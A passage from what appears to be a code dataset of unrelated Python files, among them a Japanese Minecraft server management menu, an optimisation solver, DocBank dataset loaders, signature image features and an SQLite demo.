time.sleep(0.8)\n subprocess.run(\"sudo systemctl enable minecraft\"+path.replace('/', '').replace('minecraft', ''), shell=True)\n except Exception as excep:\n check.except_print(excep, \"\", True)\n else:\n print(\"その、OSは対応していません\")\n sys.exit(6)\n 
print(\"完了しました!\")\n\ndef del_startup():\n print(\"スタートアップ(自動起動設定)の削除\")\n check.is_admin()\n print(\"設定したいサーバーを選択してください。\")\n while True:\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n windows_startup_path = \"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/\"\n linux_startup_path = \"/etc/systemd/system/\"\n if os.path.exists(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\") or os.path.exists(windows_startup_path + \"minecraft\" + path.replace('/', '').replace('minecraft', '') + \".bat\"):\n if user_use_platfrom == \"Windows\":\n try:\n os.remove(windows_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\")\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n try:\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n os.remove(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\")\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n except Exception as excep:\n check.except_print(excep, \"\" , True)\n print(\"完了しました!\")\n else:\n print(\"その、サーバーは自動起動設定がされていません\")\n continue\n break\n\ndef make_sh():\n \"\"\"shとbatファイルを生成する関数\"\"\"\n choice_lines = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_lines)).replace('\\n', '')\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n file_name = [\"start.sh\", \"start.bat\"]\n for i in file_name:\n with open(path+\"/\"+i, 'w', encoding=\"utf-8\") as file:\n print(\"echo Start!\\n\",\n \"java -Xms\"+mem_input[0]+\"G\",\n \" -Xmx\"+mem_input[1]+\"G\",\n \" -jar \"+start_jar+\" --nogui\", file=file, sep='')\n print(\"sh-batファイルを作成しました。\")\n\ndef proxy():\n print(\"サーバープロキシモード\")\n local_host = \"127.0.0.1\"\n while True:\n local_port = input(\"出力するポートを入力してください: \")\n if not local_port.isdigit():\n continue\n break\n remote_host = input(\"元のサーバーのホスト名を入力してください: \")\n while True:\n remote_port = input(\"元のサーバーのポート番号を入力してください: \")\n if not remote_port.isdigit():\n continue\n break\n proxy_program.server_loop(local_host, int(local_port), remote_host, int(remote_port))\n print(\"接続が切断されました\")\n\ndef network_info():\n \"\"\"ネットワークのIPなどを確認できる関数\"\"\"\n print(\"\\n注意: IPを公開するのは、危険度が高いです。\\n\",\n \"IPアドレスは重要な情報です。(電話番号のようなものです。) \\n\",\n \"もし、あなたが配信やIPアドレスを見せたくない状況の場合には表示しないことをおすすめします。\",\n \"\\n`yes` か `no`を選択してください。\\n[Y/N]: \")\n network_info_select = etc.input_yes_no(\"\")\n if not network_info_select:\n return False\n active, global_ip, private_ip = check.network(\"https://ifconfig.me\")\n if not active:\n global_ip = \"取得できません。\"\n print(\"プライベートIP (同じネットワークで参加するために必要です。)\"+private_ip)\n print(\"グローバルIP (外のネットワークから参加するために必要です。)\"+global_ip)\n input()\ndef control_server():\n while True:\n print(\"\\nモードを選択してください。\\n\",\n \"サーバー起動モード[run]\\n\",\n \"サーバーポート変更モード[change-port]\\n\",\n \"shとbatファイル作成[sh],[bat]\\n\",\n \"ネットワークの情報確認モード[network]\\n\",\n \"最大参加人数の変更モード,[max-player]\\n\",\n \"スタートアップ(Windows)、Systemd(*Linux)での自動起動の設定モード[add-startup]\\n\",\n 
\"スタートアップ(Windows)、Systemd(*Linux)での自動起動の解除モード[del-startup]\\n\",\n \"プロキシモード(テスト版)[proxy]\\n\",\n \"戻る | Exit (exit)\\n\",\n \"[R,C-P,S,B,N,M,A,D,P,E]: \", end=\"\")\n choice = input().lower()\n if choice in [\"run\", \"ru\", \"r\"]:\n start_server()\n elif choice in[\"c\", \"ch\", \"cha\", \"chan\", \"chang\",\"change\", \"change-\", \"change-p\", \"change-po\", \"change-por\", \"change-port\", \"port\"]:\n change_port()\n elif choice in[\"sh\", \"s\"]:\n make_sh()\n elif choice in[\"bat\", \"ba\", \"b\"]:\n make_sh()\n elif choice in[\"network\", \"networ\", \"netwo\", \"netw\", \"net\", \"ne\", \"n\"]:\n network_info()\n elif choice in[\"max-player\", \"max-playe\", \"max-play\", \"max-pla\", \"max-pl\", \"max-p\", \"max-\", \"max\", \"ma\", \"m\"]:\n change_max_player()\n elif choice in[\"add-startup\", \"add-startu\", \"add-start\", \"add-star\", \"add-sta\", \"add-st\", \"add-s\", \"add-\", \"add\", \"ad\", \"a\"]:\n add_startup()\n elif choice in[\"del-startup\",\"del-startu\",\"del-start\",\"del-star\",\"del-sta\",\"del-st\",\"del-s\",\"del-\",\"del\",\"de\",\"d\"]:\n del_startup()\n elif choice in [\"proxy\", \"prox\", \"pro\", \"pr\", \"p\"]:\n proxy()\n elif choice in[\"exit\", \"exi\", \"ex\", \"e\"]:\n break\n else:\n print(\"その項目はありません。\")\n","repo_name":"stsaria/Autoer-1","sub_path":"src/Server/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":13669,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74464619209","text":"from itertools import combinations\nimport xpress as xp\n\nimport numpy as np\n\n\nclass Solver:\n\n def __init__(self, accs, intervals):\n self.accs = accs\n self.accsNum = len(accs)\n self.intervals = intervals\n self.intNum = len(intervals)\n self.matches = np.array(list(combinations(self.accs, 2)))\n\n self.p = xp.problem()\n self.x = np.array([[[xp.var(vartype=xp.binary) for _ in intervals] for _ in accs] for _ in self.accs])\n self.m = np.array([xp.var(vartype=xp.binary) for _ in self.matches])\n\n self.p.addVariable(self.x, self.m)\n\n def set_constraints(self):\n # t is the index of the time period\n\n for acc in self.accs:\n # no self colab\n for t in range(self.intNum):\n self.p.addConstraint(self.x[acc.index, acc.index, t] == 0)\n\n self.p.addConstraint(xp.Sum(self.m[k] for k in self.get_acc_matches(acc)) <= 1)\n\n # colab with only one for each interval\n for acc_A in self.accs:\n for t in range(self.intNum):\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for acc_B in self.accs) <= 1\n )\n\n k = 0\n for match in self.matches:\n acc_A, acc_B = match[0], match[1]\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for t in range(self.intNum)) <= self.m[k]\n )\n k += 1\n\n def get_acc_matches(self, acc):\n indexes = []\n k = 0\n for match in self.matches:\n if acc.index == match[0].index or acc.index == match[1].index:\n indexes.append(k)\n k += 1\n\n return indexes\n","repo_name":"andygaspar/Natalia","sub_path":"Solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5594543740","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nfrom scipy import ndimage\r\nfrom scipy.ndimage import interpolation as inter\r\nim = cv2.imread('binary3.png',0)\r\nnpim=np.array(im)\r\n\r\nnp1d=np.ndarray.flatten(im)\r\n\r\n#Calculate the center of gravity of 
image\r\n\r\ncog=ndimage.measurements.center_of_mass(npim)\r\n\r\n#Calculate the entropy of the image\r\n\r\ndef entropy(signal):\r\n '''\r\n function returns entropy of a signal\r\n signal must be a 1-D numpy array\r\n '''\r\n lensig=signal.size\r\n symset=list(set(signal))\r\n numsym=len(symset)\r\n propab=[np.size(signal[signal==i])/(1.0*lensig) for i in symset]\r\n ent=np.sum([p*np.log2(1.0/p) for p in propab])\r\n return ent\r\n\r\nentr=entropy(np1d)\r\n\r\n\r\n#Finding contours of the image\r\n\r\nimage, contours, hierarchy = cv2.findContours(im,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n#The first contour\r\n\r\ncon=contours[0]\r\n\r\n#Finding the rightmost contour point\r\n\r\nmaxi=0\r\nmaxj=0\r\n\r\nfor i in range(1,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==0):\r\n if(c[j]>maxi):\r\n maxi=c[j]\r\n maxj=c[j+1]\r\n\r\n#Finding the bottom most contour point\r\n\r\nbottompointy=0\r\nbottompointx=0\r\n\r\nhighestpointy=200\r\n\r\nfor i in range(0,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==1):\r\n if(c[j]>bottompointy):\r\n bottompointy=c[j]\r\n bottompointx=c[j-1]\r\n if(c[j]<highestpointy):\r\n highestpointy=c[j]\r\n#print(\"Lowest signature point=\",bottompointx,\" , \", bottompointy)\r\n#print(\"Leftmost signature point=\",maxi,\" , \",maxj)\r\ncon=con.reshape(-1)\r\ncon=con.flatten()\r\nmini=con[0]\r\nminj=con[1]\r\n#print(\"Min point \",mini,\" , \", minj)\r\nheight=bottompointy-highestpointy\r\nwidth=maxi-mini\r\n#print(\"Height=\", height )\r\n#print(\"Width=\", width )\r\n\r\n#Finding the aspect ratio of the image\r\n\r\naspectratio=width/height\r\n\r\n#Finding the slope of the image\r\n\r\nslope=math.degrees(math.atan((maxj-minj)/(maxi-mini)))\r\n\r\n#Finding the skewness of the image\r\n\r\ndef find_score(arr, angle):\r\n data = inter.rotate(arr, angle, reshape=False, order=0)\r\n hist = np.sum(data, axis=1)\r\n score = np.sum((hist[1:] - hist[:-1]) ** 2)\r\n return hist, score\r\n\r\n\r\ndelta = 1\r\nlimit = 5\r\nangles = np.arange(-limit, limit+delta, delta)\r\nscores = []\r\nfor angle in angles:\r\n hist, score = find_score(npim, angle)\r\n scores.append(score)\r\n\r\nbest_score = max(scores)\r\nbest_angle = angles[scores.index(best_score)]\r\nprint('Best angle:',best_angle)\r\nprint(\"Slope Angle=\",slope)\r\nprint(\"Center of mass=\",cog)\r\nprint(\"Aspect ratio=\",aspectratio)\r\nprint(\"Entropy= \" +str(entr))\r\n","repo_name":"pratikIT95/Deep-Learning-Based-Offline-Signature-Verification","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28725818861","text":"from typing import List, Union, Dict, Any, Tuple, Optional\nimport os\nimport random\nimport json\nimport itertools\nfrom collections import Counter\nimport cv2\n\nimport torch\nimport pandas as pd\nimport layoutparser as lp\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset, DataLoader\nfrom PIL import Image\n\n\nDEFAULT_COLOR_MAP = {\n None: \"#C0C0C0\",\n \"abstract\": \"#ffb6c1\",\n \"author\": \"#02028b\",\n \"caption\": \"#00ff03\",\n \"date\": \"#0f0000\",\n \"equation\": \"#ff0000\",\n \"figure\": \"#ff01ff\",\n \"footer\": \"#C2C2C2\",\n \"list\": \"#302070\",\n \"paragraph\": \"#b0c4de\",\n \"reference\": \"#309000\",\n \"section\": \"#0603ff\",\n \"table\": \"#01ffff\",\n 
\"title\": \"#00bfff\",\n}\n\nDEFAULT_LABEL_MAP = {\n \"paragraph\": 0,\n \"title\": 1,\n \"equation\": 2,\n \"reference\": 3,\n \"section\": 4,\n \"list\": 5,\n \"table\": 6,\n \"caption\": 7,\n \"author\": 8,\n \"abstract\": 9, # 522\n \"footer\": 10, # 10\n \"date\": 11, # 4\n \"figure\": 12,\n}\n\n\ndef _load_json(filename):\n with open(filename, \"r\") as fp:\n return json.load(fp)\n\n\ndef _write_json(data, filename):\n\n with open(filename, \"w\") as fp:\n json.dump(data, fp)\n\n\nclass DocBankDataset(Dataset):\n def __init__(\n self,\n base_path: str,\n image_folder_name=\"DocBank_500K_ori_img\",\n text_folder_name=\"DocBank_500K_txt\",\n annotation_loading_format=\"layout\",\n cleanup_annotations=True,\n load_image=True,\n ):\n \"\"\"A dataloader for the original DocBank Dataset.\n\n The directory structure is shown as follows:\n\n `base_path`/\n ├───`image_folder_name`/\n │ └───`name`_ori.jpg\n └───`text_folder_name`/\n └───`name`.txt\n\n Args:\n path (str): The root dir of the docbank dataset\n image_folder_name (str, optional):\n The folder_name for saving all images in the docbank dataset,\n Defaults to \"DocBank_500K_ori_img\".\n text_folder_name (str, optional):\n The folder_name for saving all token+category annotations\n Defaults to \"DocBank_500K_txt\".\n annotation_loading_format (str, optional):\n Load annotation as \"layout\" or \"dataframe\"\n Defaults to \"layout\".\n cleanup_annotations (bool, optional):\n Whether to cleanup the annotation files, i.e., dropping\n \"##LTLine##\" and \"##LTFigure##\" from the annotation file\n Defaults to True.\n load_image (bool, optional):\n Whether to load images.\n Defaults to False.\n \"\"\"\n self.base_path = base_path\n\n self.image_path = self.base_path + \"/\" + image_folder_name\n self.text_path = self.base_path + \"/\" + text_folder_name\n\n self.all_index = [ele.rstrip(\".txt\") for ele in os.listdir(self.text_path)]\n\n self._empty_df = pd.DataFrame(\n columns=[\"text\", \"x_1\", \"y_1\", \"x_2\", \"y_2\", \"R\", \"G\", \"B\", \"font\", \"type\"]\n )\n\n self.export_layout = annotation_loading_format == \"layout\"\n self.cleanup_annotations = cleanup_annotations\n self.load_image = load_image\n\n def load_annotations(\n self, filename: str, cleanup=True, export_layout=True\n ) -> Union[pd.DataFrame, lp.Layout]:\n \"\"\"Load data annotations as a dataframe\n\n Args:\n filename (str): the abspath to the txt file\n cleanup (bool, optional):\n Whether to cleanup the annotation files, i.e., dropping\n \"##LTLine##\" and \"##LTFigure##\" from the annotation file\n Defaults to True.\n export_layout (bool, optional):\n Whether to convert the output format as lp.Layout format.\n Defaults to True.\n\n Returns:\n Union[pd.DataFrame, lp.Layout]:\n When export_layout=true, return a lp.Layout including all tokens\n Otherwise return a DataFrame.\n Note: the file could be empty.\n \"\"\"\n if os.stat(filename).st_size == 0:\n # Check empty file\n if export_layout:\n return lp.Layout([])\n else:\n return self._empty_df\n\n df = pd.read_csv(filename, sep=\"\\t\", header=None, encoding=\"utf-8\", quoting=3)\n df.columns = [\"text\", \"x_1\", \"y_1\", \"x_2\", \"y_2\", \"R\", \"G\", \"B\", \"font\", \"type\"]\n df[\"text\"] = df[\"text\"].astype(\"str\")\n df = df.reset_index()\n\n if cleanup:\n # Drop all ltline and ltfigure tokens\n df = df[(df[\"text\"] != \"##LTLine##\") & (df[\"text\"] != \"##LTFigure##\")]\n\n if export_layout:\n\n def convert_row_to_rectbox(row):\n rectbox = lp.TextBlock(\n lp.Rectangle(row[\"x_1\"], row[\"y_1\"], 
row[\"x_2\"], row[\"y_2\"]),\n text=row[\"text\"],\n type=row[\"type\"],\n id=row[\"index\"],\n )\n rectbox.font = row[\"font\"]\n return rectbox\n\n layout = df.apply(convert_row_to_rectbox, axis=1).tolist()\n return lp.Layout(layout)\n else:\n return df\n\n def get_text_anno_path(self, name: str) -> str:\n return os.path.join(self.text_path, name + \".txt\")\n\n def get_image_path(self, name: str) -> str:\n return os.path.join(self.image_path, name + \"_ori.jpg\")\n\n def __getitem__(\n self, idx: int\n ) -> Tuple[str, Union[pd.DataFrame, lp.Layout], Optional[\"Image\"]]:\n \"\"\"Return the name, layout, and image for an item in the dataset.\n\n Returns:\n Tuple[str, Union[pd.DataFrame, lp.Layout], Optional[Image]]:\n the filename of the given item,\n the token info and category annotation\n the image of the file (when self.load_image==True)\n \"\"\"\n\n name = self.all_index[idx]\n\n text_anno_name = self.get_text_anno_path(name)\n text_anno = self.load_annotations(\n text_anno_name, self.cleanup_annotations, self.export_layout\n )\n\n if not self.load_image:\n return name, text_anno\n\n image_anno_name = self.get_image_path(name)\n image = Image.open(image_anno_name)\n w, h = image.size\n text_anno = text_anno.scale((w / 1000, h / 1000))\n # scale the text annotaiton to image size\n return name, text_anno, image\n\n\nclass DocBankBlockClassificationDataset(Dataset):\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n ):\n \"\"\"A dataloader for the DocBank Block Classification Dataset.\n\n The directory structure is shown as follows:\n\n `base_path`\n ├───dev.json\n ├───train.json\n └───test.json\n\n This dataset is used for training the block text classification model\n in the pipeline method. It is generated by using the blocks predicted by\n visual layout detection models. These models generate block level bounding\n boxes, and we use these blocks for grouping tokens from the docbank dataset.\n It is generated by the xxx.py script, and all the token data is stored in the\n JSON files for better IO performance.\n\n The JSON contains the following fields:\n\n {\n \"data\": a list of block text data, specified below,\n \"labels\": a dict used (label_id, label_name) for the data,\n \"problematic_items\": optional, see below\n }\n\n As for each data item, it is saved as:\n {\n \"words\": a list of words in the text block,\n \"bbox\": a list of block bounding boxes for all words,\n \"labels\": the label_id for this block.\n }\n\n\n Note: Sometimes we might have some tokenization bugs from the dataset. To avoid it from\n disrupting the training process, we can identify these item indices before training and\n excluding them from being loaded during training. 
These indices are stored in the JSON\n as well, under the field \"problematic_items\".\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder.\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n\n # TODO: Update the filename and link in the docstring\n\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n _data = raw_data[\"data\"]\n self.labels = raw_data[\"labels\"]\n\n self._data = []\n for ele in _data:\n if ele != {} and len(ele[\"words\"]) == len(ele[\"bbox\"]):\n ele[\"words\"] = [str(word) for word in ele[\"words\"]]\n self._data.append(ele)\n\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n del raw_data\n\n def __getitem__(self, idx):\n if not self.encode_first:\n return self._data[self._all_indices[idx]]\n else:\n if self._encoded_data is None:\n raise ValueError(\"Please run self.encode_data(tokenizer) first\")\n return self._encoded_data[idx]\n\n def __len__(self):\n return len(self._all_indices)\n\n def index_or_load_problematic_items(self, raw_data: Dict) -> List[int]:\n if \"problematic_items\" not in raw_data:\n print(\"problematic_items are not loaded.\")\n error_idx = []\n else:\n print(\"Loading problematic items from file\")\n error_idx = raw_data.get(\"problematic_items\", [])\n return error_idx\n\n def encode_data(self, tokenizer):\n\n self._encoded_data = []\n\n for idx in tqdm(self._all_indices):\n self._encoded_data.append(tokenizer.encode_plus([self._data[idx]]))\n\n\nclass DocBankBlockEmbeddingDataset(DocBankBlockClassificationDataset):\n \"\"\"\"\"\"\n\n LONG_PASSAGE_THRESHOLD = 752\n MAX_SEQ_LEN = 512\n MAX_BLOCK_EMBEDDING_NUMBER = 32\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n \"\"\"A dataloader for the DocBank Block Embedding Dataset.\n\n This dataset is used for training the block embedding LayoutLM model\n It is generated similar to `DocBankBlockClassificationDataset`.\n\n Different from DocBankBlockClassificationDataset, for each data item,\n it stores all text for a page, and also includes a new field call block_ids:\n {\n \"words\": a list of words for the whole page,\n 
\"bbox\": a list of block bounding boxes for all words,\n \"labels\": a list of label_ids for all tokens,\n \"block_ids\": the block ids for each token on this page\n }\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n add_class_weight (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n self.labels = raw_data[\"labels\"]\n self.files = raw_data.get('files')\n\n self._data = raw_data[\"data\"]\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n # NEW IN THIS CLASS\n print(\"Dropping pages of many blocks\")\n self._all_indices = [\n ele\n for ele in self._all_indices\n if max(self._data[ele][\"block_ids\"]) + 1 < self.MAX_BLOCK_EMBEDDING_NUMBER\n ]\n # Because 0 is reserved for \"tokens not in any blocks\"\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n\n self.add_class_weight = add_class_weight\n if self.add_class_weight:\n results = list(\n itertools.chain.from_iterable(\n [self._data[idx][\"labels\"] for idx in self._all_indices]\n )\n )\n cnts = Counter(results)\n freq = torch.Tensor([cnts[i] for i in range(len(self.labels))])\n self.class_weight = -torch.log(freq / freq.sum())\n\n n_gpus = torch.cuda.device_count()\n if n_gpus > 1:\n self.class_weight = self.class_weight.unsqueeze(0).repeat(n_gpus, 1)\n\n del raw_data\n\n def __getitem__(self, idx):\n\n item = self._data[self._all_indices[idx]]\n word_count = len(item[\"words\"])\n\n # For longer articles, BERT will only select the first 512 tokens.\n # To expose the model with the tailing text in these longer passages,\n # we randomly sample the starting point.\n\n if word_count > self.LONG_PASSAGE_THRESHOLD:\n start = random.choice([0, word_count - self.MAX_SEQ_LEN])\n item = {key: val[start:word_count] for key, val in item.items()}\n\n if self.add_class_weight:\n item[\"class_weight\"] = self.class_weight\n return item\n\nclass DocBankImageFeatureDataset(DocBankBlockEmbeddingDataset):\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n image_directory=str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n\n 
super().__init__(\n base_path = base_path,\n subset = subset,\n filename = filename,\n select_n = select_n,\n select_ratio = select_ratio,\n encode_first = encode_first,\n add_class_weight = add_class_weight,\n )\n\n self.image_directory = image_directory\n\n def __getitem__(self, idx):\n\n item = super().__getitem__(idx)\n \n image_filename = self.files[self._all_indices[idx]].replace('.txt', '_ori.jpg')\n image = cv2.imread(f\"{self.image_directory}/{image_filename}\")\n\n item['image'] = image\n return item","repo_name":"rayfok/scim-nlp","sub_path":"scienceparseplus/src/scienceparseplus/datasets/docbank.py","file_name":"docbank.py","file_ext":"py","file_size_in_byte":17400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"38877900287","text":"import sys\ninput = sys.stdin.readline\n# input\nN, L = map(int, input().split())\nroad = [None for _ in range(L + 1)]\nfor _ in range(N):\n\td, r, g = map(int, input().split())\n\troad[d] = (r, g)\n# process\n'''\nmax(N)=max(R)=100, max(L)=1000이므로 \n상근이의 최대 대기시간은 10000초 + 이동시간은 1000초.\n'''\ncur = 1\ntime = 0\nwhile cur < L:\n\t# 지금 위치에 신호등이 없을 경우 움직임\n\tif road[cur] is None: cur += 1\n\t# 신호등이 있으면\n\telse:\n\t\tr, g = road[cur]\n\t\t# 초록불일 경우 움직임\n\t\tif not 0 <= time % (r + g) < r: cur += 1\n\ttime += 1\t\n# output\nprint(time)","repo_name":"WaiNaat/BOJ-Python","sub_path":"2980.py","file_name":"2980.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35840077812","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\n\nclass fisher_discriminator():\n def __init__(self, fname_train):\n self.training_data = self.load_data(fname_train)\n\n # self.class_covariances = None\n # self.class_means = self.calc_means()\n # self.class_determinants = None\n\n\n def train(self,):\n covs = self.calc_covariances()\n\n return\n\n\n def calc_means(self,):\n means = {}\n\n for key in self.training_data.keys():\n mu = np.sum(self.training_data[key], axis=0) # sum over data\n mu = mu / self.training_data[key].shape[0] # divide by N\n means[key] = mu\n\n print(means)\n return means\n\n\n def calc_covariances(self,):\n covs = {}\n means = self.calc_means()\n\n for key in means.keys():\n covs[key] = np.matmul(self.training_data[key].T, self.training_data[key])\n print(covs[key].shape)\n\n return covs\n\n\n def calc_determinants(self,):\n dets = {}\n covs = self.calc_covariances()\n\n for key in covs.keys():\n dets[key] = np.linalg.det(covs[key])\n print(dets[key])\n\n return\n\n\n def load_data(self, fname):\n data_raw = np.genfromtxt(fname, delimiter=' ')\n data = {i : [] for i in range(0, 10)}\n\n for row in data_raw:\n data[int(row[0])].append(row[1:])\n\n for key in data.keys():\n data[key] = np.array(data[key])\n\n return data\n\n\ndef main():\n fd = fisher_discriminator('zip.train')\n fd.calc_determinants()\n means = fd.calc_means()\n print(means)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rrtroutslater/stat_learning","sub_path":"fisher_discriminator/fisher_discriminator.py","file_name":"fisher_discriminator.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72839191687","text":"# Import SQLITE\nimport sqlite3\n\ndef tableExists(con, tableName):\n cur = con.cursor()\n # Zkus...\n try:\n # Ziskat pocet tabulek s nazvem 'tableName' ze specialni tabulky sqlite_master\n 
cur.execute(\"SELECT COUNT(*) FROM sqlite_master WHERE type=? AND name=?;\", ('table', tableName))\n except sqlite3.Error as e:\n # Ooops, neco se nepovedlo, napis, kde je problem a skocni\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n r = cur.fetchone()\n # Vrat True, pokud SQL dotaz nasel prave jeden zaznam (tzn. tabulka 'tableName' existuje),\n # nebo False, pokud SQL dotaz nenasel nic (tzn. tabulka 'tableName' neexistuje)\n return r[0] == 1\n\ndef createMyTable(con):\n cur = con.cursor()\n # Zkus ...\n try:\n # Vytvorit tabulku mytable\n cur.execute(\"CREATE TABLE mytable (id INTEGER PRIMARY KEY AUTOINCREMENT, name VARCHAR(60), date DATETIME);\")\n except sqlite3.Error as e:\n # Ooops, neco se nepovadlo, napis, kde je problem a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n\n# Otevri nasi databazi\ncon = sqlite3.connect('mydb.sqlite')\n# Ziskej kurzor, \"ukazatel\" do nasi databaze\ncur = con.cursor()\n\n# Zkontroluj, jestli tabulka uz existuje a kdyz ne, tak ji vytvor\nif not tableExists(con, 'mytable'):\n createMyTable(con)\n\n# Zeptej se na jmeno\nname = input(\"Zadej jmeno: \")\n\n# Zkus...\ntry:\n # Vloz do tabulky zadane jmeno a aktualni datum a cas\n cur.execute(\"INSERT INTO mytable (name, date) VALUES(?, datetime('now'));\", (name,));\nexcept sqlite3.Error as e:\n # Kdyz se to nepovede, tak vypis proc a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n# Vsechno se povedlo, ukonci transakci a data fyzicky uloz do databaze (na disk)\ncon.commit()\n\n# Vyber vsechny zaznamy z tabulky\nres = cur.execute(\"SELECT id, name, date FROM mytable ORDER BY date DESC;\")\n\n# Vezmi jeden zaznam z 'res' (vysledku')\nrow = res.fetchone()\n# Opakuj, dokud row neni None (prazdny)\nwhile row != None:\n # Vypis jmeno a datum z aktualniho zaznamu\n print(\"ID: {id:<5} Name: {name:10} Date: {date}\".format(id = row[0], name=row[1], date=row[2]))\n # Posun se na dalsi zaznam z tabulky\n row = res.fetchone()\n\n# Ukonci spojeni s databazi a skonci\ncon.close()\n","repo_name":"danvratil/dapraha-flask","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10417312929","text":"# May cause deprecation warnings, safe to ignore, they aren't errors\nfrom pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import desc\n# Can only run this once. 
